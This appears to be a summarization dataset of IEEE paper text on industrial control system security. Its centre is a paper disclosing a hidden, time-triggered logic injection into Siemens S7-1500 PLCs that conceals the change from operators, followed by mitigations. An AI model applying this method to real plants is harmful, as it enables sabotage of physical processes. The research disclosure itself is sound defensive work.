steps. From these approaches to detecting both control channel and FDI attacks, one can see that an effectivemethod toward detecting ICS intrusions involves moni-toring the physical process itself, as well as its interac-tions with the controller and sensors. D. Theoretical ICS Security Frameworks A number of recent advances have generalized the in- creasing body of results to provide theoretical frame-works. In this section, we will review such theoreticalframeworks based on the following three approaches:1) modeling attacker behavior and identifying likely at-tack scenarios; 2) defining the general detection and identification of attacks against ICS; and 3) the distri- bution of security enhancements in ICSs where con-trollers share network infrastructure. A common themein these frameworks is the optimal distribution of secu-rity protections in large, legacy ICSs. Adding protections like cryptographic communica- tions to legacy equipment is expensive. Thus, it is prefer-able to secure the most vulnerable portions of an ICS. Teixeira et al. describe a risk management framework for ICSs [139]. Starting with the notion of security indices[137], this work looks at methods for identifying themost vulnerable measurements in both static and dy-namic control systems. For static control systems, it isassumed that adversaries wish to execute the minimumcost attack. In the static case, the /C11 kindex described in Section IV-C is sufficient, and methods are given for effi- ciently computing /C11kfor large systems. In the case of dynamic systems, the maximum- impact, minimum-resource attacks are defined as a mul-tiobjective optimization problem. For such a problem,the basic security indices do not suffice. Instead, themultiobjective problem is transformed into a maximum-impact, resource-constrained problem. An example isgiven where this is used to calculate the attack vectors for a quadruple-tank system. The resulting, optimal attack strategy can be used to allocate defenses such as dataencryption in the ICS. Another framework considers generalizing attacks against ICSs and describe the fundamental limitations ofmonitors against these attacks [140]. Assuming that an at-t a c km o n i t o ri sc o n s i s t e n t ,i . e . ,d o e sn o tg e n e r a t ef a l s epositives, it is shown that some attacks are undetectable if there is an initial state which produces the same final state as an attack. Additionally, it is shown that some at-tacks cannot be distinguished from others. These resultsare applicable to stealthy [141], replay [142], and FDIattacks. The previous two approaches considered ways of modeling attacks and attack likelihoods against individualcontrol loops. However, in some systems, a number of otherwise independent control process are actually some- what dependent due to the shared network. In this case,a distributed denial of service (DDoS) attack against onecontroller may affect others. The problem of interdepen-dent control systems using a game-theoretic approach isaddressed in [143]. The noncooperative game consists oftwo stages: 1) each control loop (player) chooses whetherto apply security enhancements; and 2) each player ap- plies the optimal control input to its plant. In the nonsocial form of this game, players only at- tempt to minimize their own cost, which consists of theoperating costs of the plant plus the cost of adding andmaintaining security measures. For this form of thegame, with M-players, there is shown to exist a unique equilibrium solution. The solutions to this game may notbe globally optimal, due to externalities imposed by players that opt-out of security enhancements. To solve this, penalties are introduced for players that do not se-lect security enhancements leading to a guaranteed un- ique solution that is also globally optimal. While such agame-theoretic approach is useful in distributing the costof security enhancements, actually achieving robust con-trol in distributed systems is more difficult, especiallywhen the system in question is nonlinear. To this end, a modification to a traditional model-predicative control (MPC) problem has been suggested [144]. Adding a ro-bustness constraint to the MPC problem can bound thevalues of future states. These theoretical frameworks offer opportunities to understand and improve defenses. However, it is impor-tant to understand the assumptions behind the frame-works. For example, the above approaches assume the following. 1) Attackers are omniscient, knowing the exact measurement, control, and process matrices foreach system, as well as all system states. 2) Attackers are nearly omnipotent, with the ability to compromise any measurement and controlvector. There is an important exception here,which is that detectors are assumed to be im- mune to attackers. 3) Detectors do not create false positives and sys- tems are completely deterministic (first twoapproaches). 4) Security enhancements can significantly mitigate DDoS attacks on various network architectures(third approach). 1052 Proceedings of the IEEE | Vol. 104, No. 5, May 2016McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. In any assessment procedure, the actual set of assump- tions should be considered and compared with those of the theoretical framework being used in the assessment. V.CONCLUSION ICT-based ICS can deliver real-time information, result- ing in automatic and intelligent control of industrialprocesses. Inherently dangerous processes, however, are no longer immune to cyber threats, as vulnerable de- vices, formats, and protocols are not hosted on dedicatedinfrastructure due to cost pressures. Consequently, ICSinfrastructure has become increasingly exposed, either bydirect connection to the Internet, or via interfaces toutility IT systems. Therefore, inflicting substantial dam-age or widespread disruption may be possible with acomprehensive analysis of the target systems. Publicly available information, combined with default and well-known ICS configuration details, could potentiallyallow a resource-rich adversary to mount a large-scaleattack. This paper surveyed the state of the art in ICS secu- r i t y ,i d e n t i f i e do u t s t a n d i n g research challenges in thisemerging area, and motivated the deployment of cyber- security methods and tools to ICS. All levels of the multi- layered ICS architecture can be targeted by sophisticatedcyberattacks and disturb the control process of the ICS.Assessing the vulnerabilities of ICS requires the develop- ment of a uniquely-ICS multilayered testbed that estab-lishes as many pathways as possible between the cyberand physical components in the ICS. These pathwayscan assist in determining the real-world consequences in terms of the technical impacts and the severity of the outcomes. An important direction of research isto develop effective methods to detect ICS intrusionsthat involve monitoring the physical processes them-s e l v e s ,a sw e l la st h e i ri n t e r actions with the controller and sensors. h Acknowledgment The authors from New York University (NYU) would l i k et ot h a n kS .L e e ,P .R o b i s o n ,P .S t e r g i o u ,a n dS .K i mfrom Consolidated Edison for their continuous supporton the project, Platform Profiling in Legacy and ModernControl and Monitoring Systems.
Summary:
|Industrial control systems (ICSs) are transition- ing from legacy-electromechanical-based systems to modern information and communication technology (ICT)-based sys-tems creating a close coupling between cyber and physicalcomponents. In this paper, we explore the ICS cybersecuritylandscape including: 1) the key principles and unique aspectsof ICS operation; 2) a brief history of cyberattacks on ICS;3) an overview of ICS security assessment; 4) a survey of uniquely-ICS testbeds that capture the interactions between the various layers of an ICS; and 5) current trends in ICS at- tacks and defenses.
|
Summarize:
Index Terms PLCs, ICSs, Cyber Attacks, Cyber-Physical systems security; I.INTRODUCTION Attackers target the control logic program to compromise exposed Programmable Logic Controllers (PLCs) aiming at sabotaging the control processes driven by the victim industrial devices. Such a threat is known, in the industrial community, as a control logic injection, or a control logic modi cation. It involves manipulating the original user-program that the PLC is programmed with, typically by employing a man in the middle (MITM) approach as reported in [2], [3], [7] [9], [11], [19] [21], [31], [32], [36]. The main vulnerability that attackers exploit in this attack is the lack of integrity algorithms used by PLC protocols. As a response to this threat, most of the ICS vendors recommended engineers and ICS operators to set passwords to avoid unauthorized accesses form malicious adversaries. In other words, when a user tries to gain access to the program running in a PLC, it rst checks if he is authenticated by initiating a so-called authentication protocol. If the authentication process succeeds, it allows him to read/write the program using a proprietary communication protocol. However, this solution could not suf ciently secure PLCs from unauthorized access as previous academic efforts[1] [3], [7], [22], [36] presented successful bypass attacks on the authentication methods used in PLCs from different vendors. Consequently, protecting the control logic programs with only setting passwords failed to prevent attackers from accessing PLCs and manipulating their programs. The existing control logic injection attacks in the research community have two huge challenges: First, a classic injection attack is normally designed to have access to PLCs in certain circumstances [2] [9], [15], [20], [21], [31], [36] e.g., the security means applied are absent or disabled for a speci c reason such as there are ongoing impenitence processes, other hardware components are added/removed to/from the control network, security means are being updated, etc. Despite PLCs during those critical times have a high chance to get unautho- rized infections, but they are not running in their normal states i.e. the physical processes are, more likely, to be temporally off. Thus, if an adversary gains access to the victim PLC dur- ing those times, and conducts his attack right after that, he will, pretty likely, not success in impacting the physical process. Secondly, once the ICS operator is done with any maintenance process, he normally re-activates the security means before operating the system once again. This procedure allows him to detect any infection in the PLC. Our approach introduced in this paper overcomes the above-mentioned challenges by inserting certain malicious instructions in an interrupt block, and then patching the target PLC with the block once the attacker manages to access the control network successfully. The infection remains invisible in the PLC s memory, and will be only activated at a later time that the adversary sets. This ensures that the patch is not being triggered in case the system is not running normally, or being revealed by implemented security means. The prime focus of this paper is on S7 SIMATIC PLCs provided by Siemens. This is because of the fact that Siemens leads the industrial automation market [33] [35], and their SIMATIC families have approximately 30-40% of the entire industry market. Our experiments involve the newest PLC line i.e. S7-1500, and its respective engineering software i.e. Totally Integrated Automation (TIA) Portal software. The motivation behind this work is that Siemens reportedly claimed that its S7-1500 PLCs are pretty secured against various attacks, and the developed S7CommPlus protocol used in such devices has improved anti-replay and integrity check mecha- nisms. For implementing a real-world attack, a Fischertechnik2022 XXVIII International Conference on Information, Communication and Automation Technologies (ICAT) | 978-1-6654-6692-9/22/$31.00 2022 IEEE | DOI: 10.1109/ICAT54566.2022.9811147 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:29 UTC from IEEE Xplore. Restrictions apply. industry controlled by an CPU S7-1512SP was used. A.Assumptions To conduct a real-world attack scenario, as TRITON [12] and Ukraine power grid attack [13], we suppose that an adversary has already access to the control network. Knowing that attackers can gain access to the control network via a typical IT attack e.g., an infected USB stick or a typical social engineering attack e.g., shing attack. To make our attack more challenging, we also assume that the adversary has no access to the engineering software, and can only record the network traf c between the PLC and the engineering software using a packet-snif ng tool such as Wireshark1. B.Attacker s goal The attacker aims at confusing the control logic of a victim PLC at a time when he is disconnected to the target or its network i.e. he is completely of ine at the point zero for the attack. Furthermore, the infection must remain concealed as long as the interrupt condition is not met. i.e. until the very moment determined by the attacker. In other words, the infection must not be revealed in the time between infecting the PLC and the attack launch date. C.Attack Scenario In this paper, we conduct the attack approach presented in gure 1. Taking into consideration the assumptions mentioned earlier, our attack consists of two main phases as follows: Fig. 1: Attack Scenario 1)Infecting the PLC :in this phase, the attacker patches the control logic program with a malicious block, precisely with the interrupt Time-of-Day (ToD) block, using the Organization Block 10 (OB10). This phase functions online i.e. when an attacker gains access to the target PLC. Please note that throughout this phase, the infection is hidden and set at idle mode to meet the second attacker s goal. 2)Triggering the infection :the attacker triggers the ma- licious block at a determined date and time on his will. This phase functions of ine i.e. without the need to be connected to the PLC/network at the point zero for the attack. The rest of this work is organized as follows. Section II provides related works. Section III presents an overview of 1https://www.wireshark.org/the latest S7CommPlus protocol version. In section IV , Our experimental setup is shown, followed by the description of our attack approach in V . Section VI assesses and discusses the impact of our attack, and then suggests some possible mitigation methods against such a threat. Finally, we conclude our work in section VII. II.RELATED WORK The most known attack representing a typical control logic injection attack is the one that targeted the Iranian nuclear facility in 2010, namely as Stuxnet [10]. More recent real- world attacks occurred in Ukraine [13], [15], and in Germany [17]. However, in the following, we overview the recent related academic works. In 2015, Klick et al. [4] introduced a malicious injection into the program running in a SIMATIC PLC, without confusing the execution process of the user-program. In a follow up work, Spenneberg et al [5] published a PLC worm. The infec- tion approach presented in their work was spreading internally from one PLC to another. A Ladder Logic Bomb malware written in ladder logic or one of the high-level programming languages was introduced in [6]. This malicious malware was injected by an adversary into a control logic program running in an exposed PLC. In 2021, researchers in [2] showed that S7-300 PLCs are vulnerable to control modi cation attacks and demonstrated that confusing a physical process controlled by an infected PLC is feasible. After compromising the security measures, the authors conducted an injection attack and managed successfully to keep their infection hidden from the engineering software. Their concealment approach is based on engaging a fake PLC impersonating a real uninfected PLC. The authors of [31] overcame the anti-replay mechanism used in the newer S7 PLC models, and presented that a skilled adversary could craft valid captured packets to make malicious changes to the control logic program. The authors of Rogue7 [19] introduced a rogue engineering station that can operate as the engineering software to the PLC and injects any malicious code the attacker wishes. By understanding how cryptographical messages were transferred between the parties, they hided their infection in the PLC s memory. All those mentioned attacks were quite limited, and required from adversaries to be connected to the PLC at the point zero of the attack. Thus, the possibility of being detected by the ICS operators or security means implemented is high. To overcome the existing limitations in the previous works, we introduced a novel attack approach based on injecting PLCs with an interrupt code, precisely with Time-Of-Day block [8]. The certain malicious block used in our attack aims at interrupting the execution process of the program at a certain time the attacker sets. Our experimental results proved the proposed concept of that an adversary could manipulate the control process even if he is not connected to the target PLC. Despite the fact that our attack approach was only conducted on an S7-300 PLC and designed to force the PLC to switch off, the attack was ef cient and could confuse the execution se- quence of the program running in the victim PLC. Such attacks Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:29 UTC from IEEE Xplore. Restrictions apply. are pretty severe as infected PLCs keep executing the original program appropriately i.e., without being confused/interrupted for hours, days, weeks, months and even years; before the very moment that the adversary wants his attack to trigger. However, the only realistic way to reveal our approach was when the ICS supervisor requested the control logic from the PLC and compared both the online and of ine codes running in the infected device and the engineering station respectively. However, we overcome this challenge as shown later. III. S7C OMM PLUSV3 PROTOCOL The latest S7 protocol version, namely as S7CommPlusV3 [18], is utilized in the newer versions of Totally Integrated Automation (TIA) Portal i.e., from V13 on, and also in the newer CPU S7-1500 rmware e.g. V1.8, 2.0, etc. The newest S7 protocol is developed to involve a sophisticated integrity method and considered to be the securest protocol compared to the prior versions e.g., S7CommPlusV1 and S7commPlusV2. It provides various operations e.g. Start, Stop, Download, Upload, etc. that are translated rst to S7CommPlus messages by the TIA Portal, and then transmitted to the PLC. Figure 2 shows the structure of a regular S7CommPlusV3 message. Fig. 2: The structure of S7CommPlusV3 message After the PLC receives the messages, it acts by executing the control operations required by the user, and then responds back to the engineering software accordingly. These messages are transferred in sessions, each has a unique ID chosen by the PLC. Figure 3 depicts the packets order in a communication session via S7CommPlusV3 protocol. As shown, each session begins with a handshake comprised of four messages. The cryptographic attributes as well as the protocol version and keys are selected over those four messages. After a successful handshake, all packets are integrity- protected utilizing a very sophisticated cryptographic protec- tion mechanism. Please note that explaining the encryption process, or extracting the encrypted keys used in this protocol is out of the scope of this paper. However, [16], [19], [32] provide suf cient technical information about the integrity protection method that the newest version of S7 protocol uses. The S7CommPlus protocol functions in a request-response method. Meaning that, each request packet contains a request- header and request-set. The header involves a function code that identi es the required operation e.g. 0x31 for a download message as shown in gure 4. Fig. 3: Messages exchanged in an S7 session via S7CommPlusV3 Fig. 4: S7CommPlus Download Request - Objects and At- tributes Furthermore, each message contains multiple objects that comprised of attributes. All the objects as well as the attributes are identi ed using unique class identi ers. For instance, the CreateObject request, sent by the engineering software to the PLC over an S7CommPlus download message, builds a new object in the PLC memory with a unique ID (in our given example, 0x04ca ). The download packet therefore generates an object of class ProgramCycleOB . This created object com- prised of multiple attributes, each has speci c values dedicated to a certain aim as follows [32]: -Object MAC : donated with the item value ID: Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:29 UTC from IEEE Xplore. Restrictions apply. Block.AdditionalMac and used as an additional Message Authentication Code (MAC) value in the encryption integrity process. -Object Code : donated with the item value ID: Function- alObject.code . It is the binary executable code that the PLC reads and processes. -Source Code : donated with the item value ID: Block.BodyDescription . It is equivalent to the program written by the ICS operator which is stored in the PLC and can be later uploaded, upon request, to a TIA Portal project. IV.EXPERIMENTAL SET-UP To test our approach presented in this paper, we used a Fischertechnik training factory2as seen in gure 5. Please note that this setup is already used in experiments run earlier, i.e. the following description is very similar to the one in our former publication [32]. Fig. 5: Experimental Set-up The factory is comprised of ve industrial modules: vacuum suction gripper (VGR), high-bay warehouse (HBW), multi- processing station (MPO) with kiln, and sorting line with color recognition (SLD) environment station with surveillance camera (SSC). The entire system is controlled by a SIMATIC S7-1512SP with a rmware V2.9.2, and programmed by TIA Portal V16. The PLC connects to a TXT controller3via an IoT gateway. The TXT controller serves as a Message Queuing Telemetry Transport (MQTT) broker and an interface to the schertechnik cloud. 2https://www. schertechnikwebshop.com/de-DE/ schertechnik-lernfabrik- 4-0-24v-komplettset-mit-sps-s7-1500-560840-de-de 3https://www. schertechnik.de/en/service/elearning/playing/txt-controllerThe factory we used in our experiments provides two in- dustrial processes. Storing and ordering materials. The default process cycle begins with storing and identifying the material i.e. workpiece. The factory has an integrated NFC tag sensor storing production data that can be read out via an RFID NFC module. This allows the user to trace the workpieces digitally. The cloud displays the part s colour and its ID- number. Afterwards, the vacuum gripper places suction on the material and transports it to the high bay warehouse which applies a rst-in rst-out principle for the outsourcing. All goods that were stored could be ordered again online using a dashboard. The desired product and the corresponding color are selected by the user, and then placed in the shopping cart. The suction gripper passes the workpiece on from one step to the next, and then moves back to the sorting system once the production is complete. The sorting system receives the allocation command as soon as the color sorter detects the proper color. The material is sorted using pneumatic cylinders. Finally the production data is written on the material at the end of the production process, and the nished product will be provided for collection. V.ATTACK DESCRIPTION Our approach introduced in this work consists of two phases: infecting the PLC (Online phase), and triggering the interrupt block (Of ine phase). Please take note that, obtaining the IP and MAC address, as well as the model of the victim PLC is out of the scope of this paper, and can be achieved by applying a PN-DCP protocol based scanner [36], S7CommPlus scanner [37], or any other network scanner. In the next two subsections, we illustrate our attack approach in details. A.Infecting the PLC (Online Phase) Here, we aim at patching the victim with malicious com- mands inserted in OB10. For this purpose, we utilize a developed Man-in-the-Middle (MITM) station that contains two components: -TIA Portal Software: to bring back and modify the actual program that the victim device runs. -PLCinjector tool: to patch the PLC with the adversary s malicious code. Our infecting phase is comprised of four steps as follows: 1) reading and writing the user-program. 2) altering and updating the user-program. 3) concealing the malicious infection. 4) transferring the crafted S7 messages. 1)Reading & Writing the user-Program : After gaining access to the control network, we need to steal the user-program that the victim device is programmed with. Figure 6 describes this step. As seen, we launch the attacker s TIA Portal and establish a connection with the target PLC directly. Due to a security gap in the newest S7 PLCs design i.e., S7-1500 series, we were able to communicate with the victim device using an unauthorized TIA Portal software. For a better understanding, the S7-1500 PLC does not implement Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:29 UTC from IEEE Xplore. Restrictions apply. any security mechanisms or checking procedures to ensure that the presently connected TIA Portal software is the same one that the PLC communicated with in a previous communication session [32]. This vulnerability allows any adversary having a TIA Portal software installed on his machine to easily communicate with S7 PLCs without any effort. After the communication is successfully established, we require the user-program to the attacker s TIA Portal software by sending an upload command. Afterwards, we download it again to the target and record the entire S7CommPlus packets ow transmitted between the attacker s machine and the victim PLC utilizing the Wireshark software. Eventually, the adversary has the user-program on his own TIA Portal software, as well as all the captured messages dedicated to the download command are saved in a Pcap le for a further use in the next steps. Fig. 6: Upload, download, and record the user-program 2)Altering & Updating the user-program : After we retrieve the user-program, the unauthorized TIA Portal displays it in a high-level programming language that it was originally programmed with (e.g. Structured Control Language SCL). By understanding the control process driven by the victim PLC, we can con gure malicious instructions that manipulate certain outputs or inputs in the target system e.g., we can force a certain output to turn off when the interrupt block is being triggered. This is done as follows. We add to the current user-program a new OBwith the speci c event class Time-of-Day , and then entering the name of the block, the desired programming language (e.g. SCL), and the number of the assigned organization block i.e. 10. After that, we program the block with the attacker s commands to be executed when the interrupt occurs. However [30] provides all the technicaldetails to con gure and program Time-of-Day interrupts in S7- 1500 PLCs. In spite of the fact that our malicious code differs with only an extra small-size block (OB10) from the original one, it is suf cient to disturb the control process of our experimental set-up as shown later in the next section. The easiest way to infect the PLC is to write the modi ed program directly to the PLC using the attacker s TIA Portal. This allows the attacker to transfer his program (the original code with the new interrupt block OB10) into the victim PLC without any effort. After the PLC receives the attacker s program, it updates its program successfully without knowing that it is connecting to a non-authorized TIA Portal. 3)Concealing the malicious infection : Downloading the attacker s program into the PLC using the attacker s TIA Portal has a challenge. The legitimate user can easily disclose the infection by requiring the control logic from the patched device, and comparing the of ine program that is saved on the legitimate engineering station i.e., TIA Portal with the online program running on the remote PLC (similar to how the infection in [8] was revealed). To overcome this challenge, we need to conceal the infection from the ICS operator by transferring the attacker s code over a crafted S7CommPlus download message. Siemens provides its S7-1500 PLCs with a precaution procedure that double-checks each session freshness. Thus, it can reveal any potential manipulation and rejects to update its program in case the attributes of the ProgramCycleOB object do not have the same session ID i.e. do not belong to the same session. This procedure is a part of a very complex anti-replay mechanism that Siemens uses to protect its newest PLCs line from replay attacks. However, our observations showed that the PLC does not check the integrity of all the attributes transferred over S7CommPlus protocol as expected. Meaning that, the PLC checks only speci c integrity bytes that only Object Mac andObject Code contain in their bytecodes, whilst theSource Code does not have those integrity bytes, or any other bytes dedicated to security purposes. Consequently, we can conclude that the Source Code attribute is not integrity checked by the PLC and attackers could maliciously replace this attribute with another one from an already pre-recorded S7CommPlus message. Thus by using Scapy4, we can craft the attacker s S7CommPlus download message by substituting theSource Code attribute of the ProgramCycleOB object of the malicious program with the Source Code attribute of the ProgramCycleOB object of the original user-program. Figure 7 depicts this method. In such a scenario and whenever the ICS supervisor requires the control logic from the infected PLC, it will respond by sending the ProgramCycleOB object stored in its memory. The TIA Portal then decompiles the Source Code attribute which is eventually representing the original user-program not the 4Scapy (https://scapy.net/) is a powerful packet manipulation program written in python. It features a variety of packet manipulation capabilities including: snif ng and replaying packets in the network, network scanning, tracerouting, etc. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:29 UTC from IEEE Xplore. Restrictions apply. Fig. 7: Crafting the S7CommPlus download message attacker s program. This method deceives the ICS operator by showing him always the original user-program, whilst the PLC executes a different one. 4)Transferring the Crafted S7 message : Our crafted download packet comprises of the following attributes: the Object MAC andObject Code attributes of the malicious program, and the Source Code attribute of the user- program. To push the message into the target PLC, we used our developed PLCinjector tool published in [32]. The tool is dedicated to inject S7-1500 PLCs and has two Functions. The rst function is employed to compromise the two integrity protection modules that S7CommPlusV3 utilizes i.e. the pre- fragment messages protection and the session key exchange protocol. Whilst the second function is based on Scapy, and used to send the adversary s download packet to the PLC after the proper modi cation to the session ID, and certain integrity elds of the S7 message are done. It is worth mentioning that our PLCinjector tool could be also used on all the S7-1500 PLCs sharing the same rmware as Siemens has designed the new S7 key exchange mechanism with a strong assumption that all PLCs have the same rmware version utilize also the same public-private key mechanism [19]. B.Triggering phase (Of ine) After we inject our malicious program into the target PLC, we go of ine and close the current live session with the victim and its network. The malicious program, precisely with the next execution cycle, will be executed and the CPU checks the interrupt condition in each execution cycle. Our patch remains in idle mode, and unobserved in the PLC s memory until the interrupt condition is met i.e., once the date of the attack, the attacker sets, matches the date of the CPU, the interrupt will be triggered, and the malicious instructions in block OB10 will then be processed. In our experimental setup, we programmed the OB10 to impose particular motors to switch off at a speci c time and date when we are disconnected from the control network. VI. RESULTS , EVALUATION ,AND MITIGATION In this section, we show the results of implementing our attack scenario presented in the former section, and evaluatethe service disruption of the control process due to our patch. After that, we discuss our experimental results and suggest some possible mitigation methods to save our industrial sys- tems from such a serious attack. A.Results For achieving convincing results, we conducted ve attack scenarios on the industrial modules of our Fischertechnik factory. In the following we explain only one scenario in details as the other scenarios are performed in the same way. The rst attack scenario aims at confusing the VGR module. This module operates using 8 motors as follows: vertical motor up (%Q2.0) , vertical motor down (%Q2.1) , horizontal motor backwards (%Q2.2) , horizontal motor forwards (%Q2.3) , turn motor clockwise (%Q2.4) , turn motor anti-clockwise (%Q2.5) , compressor (%Q2.6) , and valve vacuum (%Q2.7) . Those 8 motors (PLC s outputs) are assigned to speci c parameters in a data block, namely QX_VGR and used in the control logic program as: QX_VGR_M1_VerticalAaxisUp_Q1 , QX_VGR_M1_VerticalAaxisDown_Q2 , QX_VGR_M2_HorizontalAxisBackward_Q3 , QX_VGR_M2_HorizontalAxisForward_Q4 , QX_VGR_M3_RotateClockWise_Q5 , QX_VGR_M3_RotateCounterclockwise_Q6 , QX_VGR_Compressor_Q7 , QX_VGR_ValveVacuum_Q8 respectively. For confusing the VGR module, we inserted our OB10 with speci c commands to switch all the 8 motors off at the point zero for the attack. Afterwards we patched the PLC following the four steps explained in section V . Our results showed that we managed successfully to update the PLC s program without recording any physical impact in the time between patching the PLC, and the very determined moment to attack i.e. the workpiece keeps moving normally between the industrial modules. Once the clock of the victim CPU matches the time and date that we already con gured, we observed that the VGR module stopped moving. Moreover, the workpiece that is being shipped by the gripper has fallen down. This is due to the fact that the compressor that provides the appropriate air ow to transport the good was switched off. This led to an inappropriate operation, and the movement sequence of the workpieces was successfully confused. In a real-world plant e.g., automobile manufacturing industry, such a disturbance might be signi cantly catastrophic and costs even human lives. We extracted the outputs linked to the PLC in the same way for the other modules i.e HBW, MPO, SLD, and SSC, and then programmed the interrupt block OB10 to force the corresponding outputs to switch off when the interrupt block is being activated. Our results showed that the PLC always updates its program, and we could successfully keep the interrupt block for each infection in idle mode until the very moment determined by us. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:29 UTC from IEEE Xplore. Restrictions apply. Fig. 8: Boxplot presenting the measured execution cycle times of OB1 for ve attack scenarios B.Evaluation Siemens PLCs, by default, store the time of the last execution cycle in a local variable of OB1 called OB1_PREV_CYCLE [8]. Therefore, to evaluate the resulting disturbance of our patches on the control process accurately, we added a small SCL code snippet to our user-program that stores the last cycle time in a separate data block. Afterwards, we recorded as many as 4096 execution cycles for each scenario, calculated the arithmetic mean value, and eventually used the Kruskal-Wallis and the Dunn s Multiple Comparison test for statistical analysis. All our experimental results are shown in gure 8. Our results show that the mean value of executing OB1 for the rst infection (i.e. attacking VGR module) is approx. 38 milliseconds (ms), and slightly differs from the mean value of executing OB1 for the original user-program (baseline) which is almost 36 ms. The execution cycle time when we attacked the HBW module raised also slightly. We recorded a mean value as high as 37 ms. Our patch dedicated to attack the MPO module introduced a mean value of cycle time as high as 40 ms, whilst the highest value that our experiments recorded was when we patched the control logic with OB10 dedicated to confuse the SLD module. We noticed that the mean value raised to reach 46 ms. Patching the control logic with an OB10 to disrupt the functionality of SSC module did not record a noticeable difference in executing OB1 where the mean value that we registered was 37 ms. From all this, we could conclude that checking the interrupt condition of our malicious block (OB10) in each execution cycle does not impact on the execution process of the PLC s program, and the Fischertechnik system keeps operating nor-mally. In order to conceal our infection successfully, we need to take into consideration that executing the malicious program should not exceed the overall maximum execution time of 150 ms [8]. However, all our infections are unlikely to trigger this timeout as they are quite small compared to 150 ms. Furthermore, the size of the OB10 blocks used in our infections were quite small (almost between 6 to 9 KB). Therefore, our attack approach more likely will not exceed the free available space in the PLC s memory to store the extra malicious block that the attacker patches. C.Mitigation An appropriate recommendation we keenly suggest is to solve the integrity mechanism issues in the S7-1500 PLCs that our investigations found. The new improved mechanism must include two-way group authentication between PLCs and a TIA Portal software. But on other hand, we also under- stand that such a fundamental solution needs a while to be implemented as it requires a high cost and may probably have side-effects. Moreover, Industrial components have a longer life-cycle than the common IT devices. Thus, we believe that they, PLCs, may not be updated on time. As a result, exposed devices will still operate in real-world industrial environments. In this term, an proper immediate solution could be integrating a network detection into the existing ICS settings. For instance, a control logic detection [23], and veri cation [28], [29] can be employed to alleviate the current situation. As our infections were concealed inside the PLC, precisely in the memory, partitioning the memory space and enforcing memory access control [24] could be also a convenient solution. Another solution would be implementing a digital signature for control Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:29 UTC from IEEE Xplore. Restrictions apply. messages such as control logic manipulation, network monitor- ing tools like SNORT [25], ArpAlert [26], and ArpWatchNG [27] for disclosing any threat involving MITM approach, and a security mechanism to scan and double check the protocol header that contains critical data about the type of the payload. All those suggestions are recommended to detect and block any potential unauthorized transmission of the control logic. VII. CONCLUSION This paper extended our attack approach introduced in [8] to involve the newest SIMATIC PLCs line. Based on the design vulnerabilities in S7-1500 PLCs, we performed a sophisticated injection attack scenario that infects an exposed PLC with aTime-of-Day block (OB10). The malicious interrupt block allows attackers to trigger the patch at a certain time and date, and eventually to disturb the industrial process without being neither connected to the PLC nor to its network at the point zero for the attack. Our investigations proved the concept of that the original control logic program is always displayed on the legitimate TIA Portal, whilst the infected PLC runs another program. On other hand, our malicious program does not exceed the overall maximum execution time of 150 ms. Hence, the industrial process is not interrupted/disturbed when the patch is in idle mode. For all that, the malicious infection will not be detected even if the ICS supervisor re-activates the security means before re-operating the system. Finally, we provided some possible security recommendations to secure our ICS environments from such a severe threat.
Summary:
In this paper, we take the attack approach intro- duced in our previous work [8] one more step in the direction of exploiting PLCs of ine, and extend our experiments to cover the latest and most secured Siemens PLCs line i.e. S7-1500 CPUs. The attack scenario conducted in this work aims at confusing the behavior of the target system when malicious attackers are not connected neither to the victim system nor to its control network at the very moment of the attack. The new approach presented in this paper is comprised of two stages. First, an attacker patches the PLC with a speci c interrupt block, Time- of-Day , once he manages successfully to access/compromise an exposed PLC. Then he triggers the block at a later time the attacker wishes when he is completely of ine i.e., disconnected to the control network. For a real-world implementation, we tested our approach on a Fischertechnik system using an S7- 1500 CPU that supports the newest version of the S7CommPlus protocol i.e. S7CommPlus v3. Our experimental results showed that we could infect the target PLC successfully and conceal our malicious interrupt block in the PLC memory until the very moment we already determined. This makes our attack stealthy as the engineering station can not detect that the PLC got infected. Finally, we presented security and mitigation methods to prevent such a threat.
|
Summarize:
KEYWORDS Real-time systems, security, worst-case execution time 1 INTRODUCTION Simplenetworkedandembeddeddeviceshavebecomeincreasingly commonthroughoutthewiderangeofapplicationsasprocessors with the necessary capabilities have become cheaper and more plentiful.Increasingly,suchsystemsareincorporatedintocritical infrastructure (ranging from a single traffic light to a municipal power grid) and autonomous vehicles, i.e., systems subject to hard real-time constraints. Failing to control such systems can result inlossoflifeorsevereenvironmentaldamage.Meanwhile,cyber attacks have become widespread and are penetrating embeddedsystems as they are increasingly networked. Hence, it is becom-ingcrucialtoprotectsuchcyber-physicalsystems(CPS)fromat- tacks[7].However,securingembedded,time-constrainedsystems presentsanumberofunique challengesbeyondthoseofsecuring commoditycomputesystems[ 11].Ordinarymethodsofprotection, particularly kernel-level protection, are insufficient by themselves in embedded and real-time systems, since they focus on system functionalityandtendtoaddsignificantexecutionoverhead,yet lacktheabilitytoensurethatasystemoperateswithinitstiming constraints. In addition, some proposed protection methods aredependent on hypothetical specialized hardware [ 10], or require significantdeveloperefforttoconfigureprotectionbasedonknownthreatsandsystemperformancerequirements.Tofillthisgap,meth- ods need to be developed for implementing kernel-level protectioninto the RTOS, as well as allow for easy configuration based on elastic timing bounds. Real-time systems require accurate timing information and pre- dictablebehaviorwithregardstoexecutiontime.Thispredictability can be leveraged to detect attacks by identifying timing irregulari- ties. Such irregularities are indicative of system malfunction dueto a cyber attack or excessive execution beyond specified WCET bounds of a task or code region. We assume the former hereafter. This work contributes T-SYS, a monitoring method for intru- siondetectionthatreliesoninsertingtimechecks(instrumentation points)alongcodepathswithknownWCETbounds.Acompiler- based tool to allow the automatic integration T-SYS protection basedonauser-definedMaximumVulnerabilityThresholdisdevel- opedaswell.ThisallowsT-SYStobeconfigured,atcompiletime, according to expected threats, security requirements, or system performance.WhenT-SYSisimplementedinbothkernel-anduser- levelcode,itiscapableofprovidingend-to-endprotectionacross theentireexecutionpath.Itsinstrumentationcomplementsother conventionalsecuritytechniquesbyintegratingWCETmonitoring 